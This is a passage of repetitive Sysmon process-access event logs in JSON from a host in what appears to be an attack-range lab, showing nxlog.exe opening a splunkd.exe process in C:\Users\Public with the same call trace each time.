0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:08.348","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2966,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:09.350\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:09.350","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2967,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:10.352\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:10.352","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2968,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:11.354\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:11.354","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2969,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:12.356\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:12.356","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2970,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:13.358\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:13.358","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2971,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:14.360\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:14.360","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files 